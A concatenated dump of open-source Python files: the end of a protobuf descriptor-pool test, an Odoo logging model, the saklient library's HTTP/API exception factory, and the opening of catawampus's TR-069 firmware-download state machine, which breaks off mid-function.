# Check registration of types in the pool.
self.assertEqual(
'protobuf_unittest.ForeignEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.ForeignEnum').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.TestAllTypes.NestedEnum').full_name)
def testFindMessageTypeByName(self):
self.assertEqual(
'protobuf_unittest.TestAllTypes',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedMessage',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes.NestedMessage').full_name)
def testFindFindContainingSymbol(self):
# Lookup based on either enum or message.
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes.NestedEnum').name)
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes').name)
def testFindFileByName(self):
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileByName(
'google/protobuf/unittest.proto').name)
if __name__ == '__main__':
unittest.main()
| mit |
Nowheresly/odoo | openerp/addons/base/ir/ir_logging.py | 326 | 1882 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv, fields
from openerp.tools.translate import _
class ir_logging(osv.Model):
_name = 'ir.logging'
_order = 'id DESC'
EXCEPTIONS_TYPE = [
('client', 'Client'),
('server', 'Server')
]
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
        'create_uid': fields.integer('Uid', readonly=True),  # Integer not m2o is intentional
'name': fields.char('Name', required=True),
'type': fields.selection(EXCEPTIONS_TYPE, string='Type', required=True, select=True),
'dbname': fields.char('Database Name', select=True),
'level': fields.char('Level', select=True),
'message': fields.text('Message', required=True),
'path': fields.char('Path', required=True),
'func': fields.char('Function', required=True),
'line': fields.char('Line', required=True),
}
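# Hypothetical usage sketch (old-style ORM API assumed; values illustrative):
#   registry['ir.logging'].create(cr, SUPERUSER_ID, {
#       'name': 'my_module', 'type': 'server', 'dbname': cr.dbname,
#       'level': 'ERROR', 'message': 'something failed',
#       'path': __file__, 'func': 'main', 'line': '42'})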
| agpl-3.0 |
sakura-internet/saklient.python | saklient/errors/exceptionfactory.py | 1 | 32200 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from .httpexception import HttpException
from .httpbadgatewayexception import HttpBadGatewayException
from .httpbadrequestexception import HttpBadRequestException
from .httpconflictexception import HttpConflictException
from .httpexpectationfailedexception import HttpExpectationFailedException
from .httpfaileddependencyexception import HttpFailedDependencyException
from .httpforbiddenexception import HttpForbiddenException
from .httpgatewaytimeoutexception import HttpGatewayTimeoutException
from .httpgoneexception import HttpGoneException
from .httphttpversionnotsupportedexception import HttpHttpVersionNotSupportedException
from .httpinsufficientstorageexception import HttpInsufficientStorageException
from .httpinternalservererrorexception import HttpInternalServerErrorException
from .httplengthrequiredexception import HttpLengthRequiredException
from .httplockedexception import HttpLockedException
from .httpmethodnotallowedexception import HttpMethodNotAllowedException
from .httpnotacceptableexception import HttpNotAcceptableException
from .httpnotextendedexception import HttpNotExtendedException
from .httpnotfoundexception import HttpNotFoundException
from .httpnotimplementedexception import HttpNotImplementedException
from .httppaymentrequiredexception import HttpPaymentRequiredException
from .httppreconditionfailedexception import HttpPreconditionFailedException
from .httpproxyauthenticationrequiredexception import HttpProxyAuthenticationRequiredException
from .httprequestentitytoolargeexception import HttpRequestEntityTooLargeException
from .httprequesttimeoutexception import HttpRequestTimeoutException
from .httprequesturitoolongexception import HttpRequestUriTooLongException
from .httprequestedrangenotsatisfiableexception import HttpRequestedRangeNotSatisfiableException
from .httpserviceunavailableexception import HttpServiceUnavailableException
from .httpunauthorizedexception import HttpUnauthorizedException
from .httpunprocessableentityexception import HttpUnprocessableEntityException
from .httpunsupportedmediatypeexception import HttpUnsupportedMediaTypeException
from .httpupgraderequiredexception import HttpUpgradeRequiredException
from .httpvariantalsonegotiatesexception import HttpVariantAlsoNegotiatesException
from ..cloud.errors.accessapikeydisabledexception import AccessApiKeyDisabledException
from ..cloud.errors.accesssakuraexception import AccessSakuraException
from ..cloud.errors.accessstaffexception import AccessStaffException
from ..cloud.errors.accesstokenexception import AccessTokenException
from ..cloud.errors.accessxhrorapikeyexception import AccessXhrOrApiKeyException
from ..cloud.errors.accountnotfoundexception import AccountNotFoundException
from ..cloud.errors.accountnotspecifiedexception import AccountNotSpecifiedException
from ..cloud.errors.ambiguousidentifierexception import AmbiguousIdentifierException
from ..cloud.errors.ambiguouszoneexception import AmbiguousZoneException
from ..cloud.errors.apiproxytimeoutexception import ApiProxyTimeoutException
from ..cloud.errors.apiproxytimeoutnongetexception import ApiProxyTimeoutNonGetException
from ..cloud.errors.archiveisincompleteexception import ArchiveIsIncompleteException
from ..cloud.errors.bootfailurebylockexception import BootFailureByLockException
from ..cloud.errors.bootfailureingroupexception import BootFailureInGroupException
from ..cloud.errors.busyexception import BusyException
from ..cloud.errors.cantresizesmallerexception import CantResizeSmallerException
from ..cloud.errors.cdromdevicelockedexception import CdromDeviceLockedException
from ..cloud.errors.cdromdisabledexception import CdromDisabledException
from ..cloud.errors.cdrominuseexception import CdromInUseException
from ..cloud.errors.cdromisincompleteexception import CdromIsIncompleteException
from ..cloud.errors.connecttosameswitchexception import ConnectToSameSwitchException
from ..cloud.errors.contractcreationexception import ContractCreationException
from ..cloud.errors.copytoitselfexception import CopyToItselfException
from ..cloud.errors.deletediskb4templateexception import DeleteDiskB4TemplateException
from ..cloud.errors.deleteipv6netsfirstexception import DeleteIpV6NetsFirstException
from ..cloud.errors.deleteresb4accountexception import DeleteResB4AccountException
from ..cloud.errors.deleterouterb4switchexception import DeleteRouterB4SwitchException
from ..cloud.errors.deletestaticroutefirstexception import DeleteStaticRouteFirstException
from ..cloud.errors.disabledinsandboxexception import DisabledInSandboxException
from ..cloud.errors.disconnectb4deleteexception import DisconnectB4DeleteException
from ..cloud.errors.disconnectb4updateexception import DisconnectB4UpdateException
from ..cloud.errors.diskconnectionlimitexception import DiskConnectionLimitException
from ..cloud.errors.diskiscopyingexception import DiskIsCopyingException
from ..cloud.errors.diskisnotavailableexception import DiskIsNotAvailableException
from ..cloud.errors.disklicensemismatchexception import DiskLicenseMismatchException
from ..cloud.errors.diskorssinmigrationexception import DiskOrSsInMigrationException
from ..cloud.errors.diskstockrunoutexception import DiskStockRunOutException
from ..cloud.errors.dnsarecordnotfoundexception import DnsARecordNotFoundException
from ..cloud.errors.dnsaaaarecordnotfoundexception import DnsAaaaRecordNotFoundException
from ..cloud.errors.dnsptrupdatefailureexception import DnsPtrUpdateFailureException
from ..cloud.errors.dontcreateinsandboxexception import DontCreateInSandboxException
from ..cloud.errors.duplicateaccountcodeexception import DuplicateAccountCodeException
from ..cloud.errors.duplicateentryexception import DuplicateEntryException
from ..cloud.errors.duplicateusercodeexception import DuplicateUserCodeException
from ..cloud.errors.filenotuploadedexception import FileNotUploadedException
from ..cloud.errors.filterarraycomparisonexception import FilterArrayComparisonException
from ..cloud.errors.filterbadoperatorexception import FilterBadOperatorException
from ..cloud.errors.filternullcomparisonexception import FilterNullComparisonException
from ..cloud.errors.filterunknownoperatorexception import FilterUnknownOperatorException
from ..cloud.errors.ftpcannotcloseexception import FtpCannotCloseException
from ..cloud.errors.ftpisalreadycloseexception import FtpIsAlreadyCloseException
from ..cloud.errors.ftpisalreadyopenexception import FtpIsAlreadyOpenException
from ..cloud.errors.ftpmustbeclosedexception import FtpMustBeClosedException
from ..cloud.errors.hostoperationfailureexception import HostOperationFailureException
from ..cloud.errors.illegaldasusageexception import IllegalDasUsageException
from ..cloud.errors.inmigrationexception import InMigrationException
from ..cloud.errors.invalidformatexception import InvalidFormatException
from ..cloud.errors.invalidparamcombexception import InvalidParamCombException
from ..cloud.errors.invalidrangeexception import InvalidRangeException
from ..cloud.errors.invaliduriargumentexception import InvalidUriArgumentException
from ..cloud.errors.ipv6netalreadyattachedexception import IpV6NetAlreadyAttachedException
from ..cloud.errors.limitcountinaccountexception import LimitCountInAccountException
from ..cloud.errors.limitcountinmemberexception import LimitCountInMemberException
from ..cloud.errors.limitcountinnetworkexception import LimitCountInNetworkException
from ..cloud.errors.limitcountinrouterexception import LimitCountInRouterException
from ..cloud.errors.limitcountinzoneexception import LimitCountInZoneException
from ..cloud.errors.limitmemoryinaccountexception import LimitMemoryInAccountException
from ..cloud.errors.limitsizeinaccountexception import LimitSizeInAccountException
from ..cloud.errors.missingisoimageexception import MissingIsoImageException
from ..cloud.errors.missingparamexception import MissingParamException
from ..cloud.errors.mustbeofsamezoneexception import MustBeOfSameZoneException
from ..cloud.errors.nodisplayresponseexception import NoDisplayResponseException
from ..cloud.errors.notforrouterexception import NotForRouterException
from ..cloud.errors.notreplicatingexception import NotReplicatingException
from ..cloud.errors.notwithhybridconnexception import NotWithHybridconnException
from ..cloud.errors.oldstorageplanexception import OldStoragePlanException
from ..cloud.errors.operationfailureexception import OperationFailureException
from ..cloud.errors.operationtimeoutexception import OperationTimeoutException
from ..cloud.errors.originalhashmismatchexception import OriginalHashMismatchException
from ..cloud.errors.packetfilterapplyingexception import PacketFilterApplyingException
from ..cloud.errors.packetfilterversionmismatchexception import PacketFilterVersionMismatchException
from ..cloud.errors.paramipnotfoundexception import ParamIpNotFoundException
from ..cloud.errors.paramresnotfoundexception import ParamResNotFoundException
from ..cloud.errors.paymentcreditcardexception import PaymentCreditCardException
from ..cloud.errors.paymentpaymentexception import PaymentPaymentException
from ..cloud.errors.paymentregistrationexception import PaymentRegistrationException
from ..cloud.errors.paymenttelcertificationexception import PaymentTelCertificationException
from ..cloud.errors.paymentunpayableexception import PaymentUnpayableException
from ..cloud.errors.penaltyoperationexception import PenaltyOperationException
from ..cloud.errors.replicaalreadyexistsexception import ReplicaAlreadyExistsException
from ..cloud.errors.replicanotfoundexception import ReplicaNotFoundException
from ..cloud.errors.resalreadyconnectedexception import ResAlreadyConnectedException
from ..cloud.errors.resalreadydisconnectedexception import ResAlreadyDisconnectedException
from ..cloud.errors.resalreadyexistsexception import ResAlreadyExistsException
from ..cloud.errors.resusedinzoneexception import ResUsedInZoneException
from ..cloud.errors.resourcepathnotfoundexception import ResourcePathNotFoundException
from ..cloud.errors.runoutofipaddressexception import RunOutOfIpAddressException
from ..cloud.errors.samelicenserequiredexception import SameLicenseRequiredException
from ..cloud.errors.servercouldnotstopexception import ServerCouldNotStopException
from ..cloud.errors.serveriscleaningexception import ServerIsCleaningException
from ..cloud.errors.serveroperationfailureexception import ServerOperationFailureException
from ..cloud.errors.serverpowermustbedownexception import ServerPowerMustBeDownException
from ..cloud.errors.serverpowermustbeupexception import ServerPowerMustBeUpException
from ..cloud.errors.servicetemporarilyunavailableexception import ServiceTemporarilyUnavailableException
from ..cloud.errors.sizemismatchexception import SizeMismatchException
from ..cloud.errors.snapshotinmigrationexception import SnapshotInMigrationException
from ..cloud.errors.stillcreatingexception import StillCreatingException
from ..cloud.errors.storageabnormalexception import StorageAbnormalException
from ..cloud.errors.storageoperationfailureexception import StorageOperationFailureException
from ..cloud.errors.switchhybridconnectedexception import SwitchHybridConnectedException
from ..cloud.errors.templateftpisopenexception import TemplateFtpIsOpenException
from ..cloud.errors.templateisincompleteexception import TemplateIsIncompleteException
from ..cloud.errors.toomanyrequestexception import TooManyRequestException
from ..cloud.errors.unknownexception import UnknownException
from ..cloud.errors.unknownostypeexception import UnknownOsTypeException
from ..cloud.errors.unsupportedresclassexception import UnsupportedResClassException
from ..cloud.errors.usernotspecifiedexception import UserNotSpecifiedException
from ..cloud.errors.vncproxyrequestfailureexception import VncProxyRequestFailureException
from ..util import Util
import saklient
str = six.text_type
# module saklient.errors.exceptionfactory
class ExceptionFactory(object):
## @static
# @param {int} status
# @param {str} code=None
# @param {str} message=""
# @return {saklient.errors.httpexception.HttpException}
@staticmethod
def create(status, code=None, message=""):
if code == "access_apikey_disabled":
return AccessApiKeyDisabledException(status, code, message)
elif code == "access_sakura":
return AccessSakuraException(status, code, message)
elif code == "access_staff":
return AccessStaffException(status, code, message)
elif code == "access_token":
return AccessTokenException(status, code, message)
elif code == "access_xhr_or_apikey":
return AccessXhrOrApiKeyException(status, code, message)
elif code == "account_not_found":
return AccountNotFoundException(status, code, message)
elif code == "account_not_specified":
return AccountNotSpecifiedException(status, code, message)
elif code == "ambiguous_identifier":
return AmbiguousIdentifierException(status, code, message)
elif code == "ambiguous_zone":
return AmbiguousZoneException(status, code, message)
elif code == "apiproxy_timeout":
return ApiProxyTimeoutException(status, code, message)
elif code == "apiproxy_timeout_non_get":
return ApiProxyTimeoutNonGetException(status, code, message)
elif code == "archive_is_incomplete":
return ArchiveIsIncompleteException(status, code, message)
elif code == "bad_gateway":
return HttpBadGatewayException(status, code, message)
elif code == "bad_request":
return HttpBadRequestException(status, code, message)
elif code == "boot_failure_by_lock":
return BootFailureByLockException(status, code, message)
elif code == "boot_failure_in_group":
return BootFailureInGroupException(status, code, message)
elif code == "busy":
return BusyException(status, code, message)
elif code == "cant_resize_smaller":
return CantResizeSmallerException(status, code, message)
elif code == "cdrom_device_locked":
return CdromDeviceLockedException(status, code, message)
elif code == "cdrom_disabled":
return CdromDisabledException(status, code, message)
elif code == "cdrom_in_use":
return CdromInUseException(status, code, message)
elif code == "cdrom_is_incomplete":
return CdromIsIncompleteException(status, code, message)
elif code == "conflict":
return HttpConflictException(status, code, message)
elif code == "connect_to_same_switch":
return ConnectToSameSwitchException(status, code, message)
elif code == "contract_creation":
return ContractCreationException(status, code, message)
elif code == "copy_to_itself":
return CopyToItselfException(status, code, message)
elif code == "delete_disk_b4_template":
return DeleteDiskB4TemplateException(status, code, message)
elif code == "delete_ipv6nets_first":
return DeleteIpV6NetsFirstException(status, code, message)
elif code == "delete_res_b4_account":
return DeleteResB4AccountException(status, code, message)
elif code == "delete_router_b4_switch":
return DeleteRouterB4SwitchException(status, code, message)
elif code == "delete_static_route_first":
return DeleteStaticRouteFirstException(status, code, message)
elif code == "disabled_in_sandbox":
return DisabledInSandboxException(status, code, message)
elif code == "disconnect_b4_delete":
return DisconnectB4DeleteException(status, code, message)
elif code == "disconnect_b4_update":
return DisconnectB4UpdateException(status, code, message)
elif code == "disk_connection_limit":
return DiskConnectionLimitException(status, code, message)
elif code == "disk_is_copying":
return DiskIsCopyingException(status, code, message)
elif code == "disk_is_not_available":
return DiskIsNotAvailableException(status, code, message)
elif code == "disk_license_mismatch":
return DiskLicenseMismatchException(status, code, message)
elif code == "disk_stock_run_out":
return DiskStockRunOutException(status, code, message)
elif code == "diskorss_in_migration":
return DiskOrSsInMigrationException(status, code, message)
elif code == "dns_a_record_not_found":
return DnsARecordNotFoundException(status, code, message)
elif code == "dns_aaaa_record_not_found":
return DnsAaaaRecordNotFoundException(status, code, message)
elif code == "dns_ptr_update_failure":
return DnsPtrUpdateFailureException(status, code, message)
elif code == "dont_create_in_sandbox":
return DontCreateInSandboxException(status, code, message)
elif code == "duplicate_account_code":
return DuplicateAccountCodeException(status, code, message)
elif code == "duplicate_entry":
return DuplicateEntryException(status, code, message)
elif code == "duplicate_user_code":
return DuplicateUserCodeException(status, code, message)
elif code == "expectation_failed":
return HttpExpectationFailedException(status, code, message)
elif code == "failed_dependency":
return HttpFailedDependencyException(status, code, message)
elif code == "file_not_uploaded":
return FileNotUploadedException(status, code, message)
elif code == "filter_array_comparison":
return FilterArrayComparisonException(status, code, message)
elif code == "filter_bad_operator":
return FilterBadOperatorException(status, code, message)
elif code == "filter_null_comparison":
return FilterNullComparisonException(status, code, message)
elif code == "filter_unknown_operator":
return FilterUnknownOperatorException(status, code, message)
elif code == "forbidden":
return HttpForbiddenException(status, code, message)
elif code == "ftp_cannot_close":
return FtpCannotCloseException(status, code, message)
elif code == "ftp_is_already_close":
return FtpIsAlreadyCloseException(status, code, message)
elif code == "ftp_is_already_open":
return FtpIsAlreadyOpenException(status, code, message)
elif code == "ftp_must_be_closed":
return FtpMustBeClosedException(status, code, message)
elif code == "gateway_timeout":
return HttpGatewayTimeoutException(status, code, message)
elif code == "gone":
return HttpGoneException(status, code, message)
elif code == "host_operation_failure":
return HostOperationFailureException(status, code, message)
elif code == "http_version_not_supported":
return HttpHttpVersionNotSupportedException(status, code, message)
elif code == "illegal_das_usage":
return IllegalDasUsageException(status, code, message)
elif code == "in_migration":
return InMigrationException(status, code, message)
elif code == "insufficient_storage":
return HttpInsufficientStorageException(status, code, message)
elif code == "internal_server_error":
return HttpInternalServerErrorException(status, code, message)
elif code == "invalid_format":
return InvalidFormatException(status, code, message)
elif code == "invalid_param_comb":
return InvalidParamCombException(status, code, message)
elif code == "invalid_range":
return InvalidRangeException(status, code, message)
elif code == "invalid_uri_argument":
return InvalidUriArgumentException(status, code, message)
elif code == "ipv6net_already_attached":
return IpV6NetAlreadyAttachedException(status, code, message)
elif code == "length_required":
return HttpLengthRequiredException(status, code, message)
elif code == "limit_count_in_account":
return LimitCountInAccountException(status, code, message)
elif code == "limit_count_in_member":
return LimitCountInMemberException(status, code, message)
elif code == "limit_count_in_network":
return LimitCountInNetworkException(status, code, message)
elif code == "limit_count_in_router":
return LimitCountInRouterException(status, code, message)
elif code == "limit_count_in_zone":
return LimitCountInZoneException(status, code, message)
elif code == "limit_memory_in_account":
return LimitMemoryInAccountException(status, code, message)
elif code == "limit_size_in_account":
return LimitSizeInAccountException(status, code, message)
elif code == "locked":
return HttpLockedException(status, code, message)
elif code == "method_not_allowed":
return HttpMethodNotAllowedException(status, code, message)
elif code == "missing_iso_image":
return MissingIsoImageException(status, code, message)
elif code == "missing_param":
return MissingParamException(status, code, message)
elif code == "must_be_of_same_zone":
return MustBeOfSameZoneException(status, code, message)
elif code == "no_display_response":
return NoDisplayResponseException(status, code, message)
elif code == "not_acceptable":
return HttpNotAcceptableException(status, code, message)
elif code == "not_extended":
return HttpNotExtendedException(status, code, message)
elif code == "not_for_router":
return NotForRouterException(status, code, message)
elif code == "not_found":
return HttpNotFoundException(status, code, message)
elif code == "not_implemented":
return HttpNotImplementedException(status, code, message)
elif code == "not_replicating":
return NotReplicatingException(status, code, message)
elif code == "not_with_hybridconn":
return NotWithHybridconnException(status, code, message)
elif code == "old_storage_plan":
return OldStoragePlanException(status, code, message)
elif code == "operation_failure":
return OperationFailureException(status, code, message)
elif code == "operation_timeout":
return OperationTimeoutException(status, code, message)
elif code == "original_hash_mismatch":
return OriginalHashMismatchException(status, code, message)
elif code == "packetfilter_applying":
return PacketFilterApplyingException(status, code, message)
elif code == "packetfilter_version_mismatch":
return PacketFilterVersionMismatchException(status, code, message)
elif code == "param_ip_not_found":
return ParamIpNotFoundException(status, code, message)
elif code == "param_res_not_found":
return ParamResNotFoundException(status, code, message)
elif code == "payment_creditcard":
return PaymentCreditCardException(status, code, message)
elif code == "payment_payment":
return PaymentPaymentException(status, code, message)
elif code == "payment_registration":
return PaymentRegistrationException(status, code, message)
elif code == "payment_required":
return HttpPaymentRequiredException(status, code, message)
elif code == "payment_telcertification":
return PaymentTelCertificationException(status, code, message)
elif code == "payment_unpayable":
return PaymentUnpayableException(status, code, message)
elif code == "penalty_operation":
return PenaltyOperationException(status, code, message)
elif code == "precondition_failed":
return HttpPreconditionFailedException(status, code, message)
elif code == "proxy_authentication_required":
return HttpProxyAuthenticationRequiredException(status, code, message)
elif code == "replica_already_exists":
return ReplicaAlreadyExistsException(status, code, message)
elif code == "replica_not_found":
return ReplicaNotFoundException(status, code, message)
elif code == "request_entity_too_large":
return HttpRequestEntityTooLargeException(status, code, message)
elif code == "request_timeout":
return HttpRequestTimeoutException(status, code, message)
elif code == "request_uri_too_long":
return HttpRequestUriTooLongException(status, code, message)
elif code == "requested_range_not_satisfiable":
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif code == "res_already_connected":
return ResAlreadyConnectedException(status, code, message)
elif code == "res_already_disconnected":
return ResAlreadyDisconnectedException(status, code, message)
elif code == "res_already_exists":
return ResAlreadyExistsException(status, code, message)
elif code == "res_used_in_zone":
return ResUsedInZoneException(status, code, message)
elif code == "resource_path_not_found":
return ResourcePathNotFoundException(status, code, message)
elif code == "run_out_of_ipaddress":
return RunOutOfIpAddressException(status, code, message)
elif code == "same_license_required":
return SameLicenseRequiredException(status, code, message)
elif code == "server_could_not_stop":
return ServerCouldNotStopException(status, code, message)
elif code == "server_is_cleaning":
return ServerIsCleaningException(status, code, message)
elif code == "server_operation_failure":
return ServerOperationFailureException(status, code, message)
elif code == "server_power_must_be_down":
return ServerPowerMustBeDownException(status, code, message)
elif code == "server_power_must_be_up":
return ServerPowerMustBeUpException(status, code, message)
elif code == "service_temporarily_unavailable":
return ServiceTemporarilyUnavailableException(status, code, message)
elif code == "service_unavailable":
return HttpServiceUnavailableException(status, code, message)
elif code == "size_mismatch":
return SizeMismatchException(status, code, message)
elif code == "snapshot_in_migration":
return SnapshotInMigrationException(status, code, message)
elif code == "still_creating":
return StillCreatingException(status, code, message)
elif code == "storage_abnormal":
return StorageAbnormalException(status, code, message)
elif code == "storage_operation_failure":
return StorageOperationFailureException(status, code, message)
elif code == "switch_hybrid_connected":
return SwitchHybridConnectedException(status, code, message)
elif code == "template_ftp_is_open":
return TemplateFtpIsOpenException(status, code, message)
elif code == "template_is_incomplete":
return TemplateIsIncompleteException(status, code, message)
elif code == "too_many_request":
return TooManyRequestException(status, code, message)
elif code == "unauthorized":
return HttpUnauthorizedException(status, code, message)
elif code == "unknown":
return UnknownException(status, code, message)
elif code == "unknown_os_type":
return UnknownOsTypeException(status, code, message)
elif code == "unprocessable_entity":
return HttpUnprocessableEntityException(status, code, message)
elif code == "unsupported_media_type":
return HttpUnsupportedMediaTypeException(status, code, message)
elif code == "unsupported_res_class":
return UnsupportedResClassException(status, code, message)
elif code == "upgrade_required":
return HttpUpgradeRequiredException(status, code, message)
elif code == "user_not_specified":
return UserNotSpecifiedException(status, code, message)
elif code == "variant_also_negotiates":
return HttpVariantAlsoNegotiatesException(status, code, message)
elif code == "vnc_proxy_request_failure":
return VncProxyRequestFailureException(status, code, message)
if status == 400:
return HttpBadRequestException(status, code, message)
elif status == 401:
return HttpUnauthorizedException(status, code, message)
elif status == 402:
return HttpPaymentRequiredException(status, code, message)
elif status == 403:
return HttpForbiddenException(status, code, message)
elif status == 404:
return HttpNotFoundException(status, code, message)
elif status == 405:
return HttpMethodNotAllowedException(status, code, message)
elif status == 406:
return HttpNotAcceptableException(status, code, message)
elif status == 407:
return HttpProxyAuthenticationRequiredException(status, code, message)
elif status == 408:
return HttpRequestTimeoutException(status, code, message)
elif status == 409:
return HttpConflictException(status, code, message)
elif status == 410:
return HttpGoneException(status, code, message)
elif status == 411:
return HttpLengthRequiredException(status, code, message)
elif status == 412:
return HttpPreconditionFailedException(status, code, message)
        elif status == 413:
            return HttpRequestEntityTooLargeException(status, code, message)
        elif status == 414:
            return HttpRequestUriTooLongException(status, code, message)
elif status == 415:
return HttpUnsupportedMediaTypeException(status, code, message)
elif status == 416:
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif status == 417:
return HttpExpectationFailedException(status, code, message)
elif status == 422:
return HttpUnprocessableEntityException(status, code, message)
elif status == 423:
return HttpLockedException(status, code, message)
elif status == 424:
return HttpFailedDependencyException(status, code, message)
elif status == 426:
return HttpUpgradeRequiredException(status, code, message)
        elif status == 500:
            return HttpInternalServerErrorException(status, code, message)
elif status == 501:
return HttpNotImplementedException(status, code, message)
elif status == 502:
return HttpBadGatewayException(status, code, message)
elif status == 503:
return HttpServiceUnavailableException(status, code, message)
elif status == 504:
return HttpGatewayTimeoutException(status, code, message)
elif status == 505:
return HttpHttpVersionNotSupportedException(status, code, message)
elif status == 506:
return HttpVariantAlsoNegotiatesException(status, code, message)
elif status == 507:
return HttpInsufficientStorageException(status, code, message)
elif status == 510:
return HttpNotExtendedException(status, code, message)
return HttpException(status, code, message)
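# Hypothetical usage sketch (not part of the transpiled source):
#   ex = ExceptionFactory.create(404, "not_found", "no such resource")
#   isinstance(ex, HttpNotFoundException)   # -> True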
| mit |
ankurjimmy/catawampus | tr/download.py | 5 | 18628 | #!/usr/bin/python
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for tr-69 Download and Scheduled Download."""
__author__ = '[email protected] (Denton Gentry)'
import collections
import datetime
import errno
import os
import shutil
import time
import urlparse
import google3
import tornado
import tornado.httpclient
import tornado.ioloop
import tornado.web
import core
import helpers
import http_download
import persistobj
# Persistent object storage filename
DNLDROOTNAME = 'tr69_dnld'
BOOTROOTNAME = 'tr69_boot'
class Installer(object):
"""Install a downloaded image and reboot.
This default implementation returns an error response. Platforms are
expected to implement their own Install object, and set
tr.download.INSTALLER = their object.
"""
  def install(self, file_type, target_filename, callback):
    INTERNAL_ERROR = 9002
    callback(faultcode=INTERNAL_ERROR,
             faultstring='No installer for this platform.',
             must_reboot=False)
def reboot(self):
return False
# Class to be called after image is downloaded. Platform code is expected
# to put its own installer here, the default returns failed to install.
INSTALLER = Installer
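# A minimal platform installer sketch (illustrative assumption, not shipped
# code). The state machine constructs INSTALLER(downloaded_file) and later
# calls install(file_type, target_filename, callback):
#
#   class FlashInstaller(Installer):
#     def __init__(self, filename):
#       self.filename = filename
#     def install(self, file_type, target_filename, callback):
#       # ... write self.filename to the target partition here ...
#       callback(faultcode=0, faultstring='', must_reboot=True)
#     def reboot(self):
#       return os.system('reboot') == 0  # illustrative only
#
#   INSTALLER = FlashInstaller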
# Unit tests can substitute mock objects here
DOWNLOAD_CLIENT = {
'http': http_download.HttpDownload,
'https': http_download.HttpDownload
}
# State machine description. Generate a diagram using Graphviz:
# ./download.py
graphviz = r"""
digraph DLstates {
node [shape=box]
START [label="START"]
WAITING [label="WAITING\nstart timer"]
DOWNLOADING [label="DOWNLOADING\nstart download"]
INSTALLING [label="INSTALLING\nstart install"]
REBOOTING [label="REBOOTING\ninitiate reboot"]
EXITING [label="EXITING\nsend TransferComplete"]
DONE [label="DONE\ncleanup, not a\nreal state"]
START -> WAITING
WAITING -> DOWNLOADING [label="timer\nexpired"]
DOWNLOADING -> INSTALLING [label="download\ncomplete"]
DOWNLOADING -> EXITING [label="download\nfailed"]
INSTALLING -> REBOOTING [label="install\ncomplete"]
INSTALLING -> EXITING [label="install\nfailed"]
INSTALLING -> EXITING [label="must_reboot=False"]
REBOOTING -> EXITING [label="rebooted,\ncorrect image"]
REBOOTING -> EXITING [label="rebooted,\nincorrect image"]
EXITING -> DONE [label="receive\nTransferCompleteResponse"]
}
"""
class Download(object):
"""A state machine to handle a single tr-69 Download RPC."""
# States in the state machine. See docs/download.dot for details
START = 'START'
WAITING = 'WAITING'
DOWNLOADING = 'DOWNLOADING'
INSTALLING = 'INSTALLING'
REBOOTING = 'REBOOTING'
EXITING = 'EXITING'
# State machine events
EV_START = 1
EV_TIMER = 2
EV_DOWNLOAD_COMPLETE = 3
EV_INSTALL_COMPLETE = 4
EV_REBOOT_COMPLETE = 5
EV_TCRESPONSE = 6
def __init__(self, stateobj, transfer_complete_cb,
download_dir=None, ioloop=None):
"""Download object.
Args:
stateobj: a PersistentObject to store state across reboots.
This class requires that command_key and url attributes be present.
transfer_complete_cb: function to send a TransferComplete message.
ioloop: Tornado ioloop. Unit tests can pass in a mock.
"""
self.stateobj = self._restore_dlstate(stateobj)
self.transfer_complete_cb = transfer_complete_cb
self.download_dir = download_dir
self.ioloop = ioloop or tornado.ioloop.IOLoop.instance()
self.download = None
self.downloaded_fileobj = None
self.downloaded_file = None
self.wait_handle = None
    # delay_seconds is measured from when we received the RPC, even if we
    # have downloaded other files and rebooted since then.
if not hasattr(self.stateobj, 'wait_start_time'):
self.stateobj.Update(wait_start_time=time.time())
def CommandKey(self):
return getattr(self.stateobj, 'command_key', None)
def _restore_dlstate(self, stateobj):
"""Re-enter the state machine at a sane state.
This state machine is supposed to download a file, install that file,
reboot, and send a completion. To do this it stores its state to
the filesystem so it can read it back in after a reboot.
If we reboot unexpectedly, like a power failure, we may have to backtrack.
For example if we had downloaded the file to /tmp and then powered off,
we lose the file and have to download it again.
The state machine can only resume into the START and REBOOTING states.
Args:
stateobj: the PersistentObject for this transfer
Returns:
the stateobj
"""
if not hasattr(stateobj, 'dlstate'):
stateobj.Update(dlstate=self.START)
dlstate = stateobj.dlstate
if dlstate == self.REBOOTING or dlstate == self.EXITING:
stateobj.Update(dlstate=self.REBOOTING)
else:
stateobj.Update(dlstate=self.START)
return stateobj
def _schedule_timer(self):
delay_seconds = getattr(self.stateobj, 'delay_seconds', 0)
now = time.time()
wait_start_time = self.stateobj.wait_start_time
# sanity checks
if wait_start_time > now:
wait_start_time = now
when = wait_start_time + delay_seconds
if when < now:
when = now
